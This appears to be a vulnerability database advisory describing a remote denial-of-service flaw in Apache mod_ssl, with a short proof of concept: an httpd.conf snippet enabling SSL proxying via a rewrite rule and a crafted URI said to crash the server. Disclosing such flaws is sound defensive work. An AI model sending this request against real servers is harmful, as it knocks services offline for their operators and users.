Apache mod_ssl Remote Denial of Service Vulnerability

info
discussion
exploit
solution
references

Apache mod_ssl Remote Denial of Service Vulnerability

No exploit is required.

The following proof of concept is available:

With the following configuration in httpd.conf:
Listen 47290
SSLProxyEngine on
RewriteEngine on
RewriteRule /(.*) https://www.example.com/$1 [P]

The server may be crashed by issuing the following URI:
http://www.example.com:47290/eRoomASP/CookieTest.asp?facility=facility&URL=%2FeRoom%2FFacility%2FRoom%2F0_4242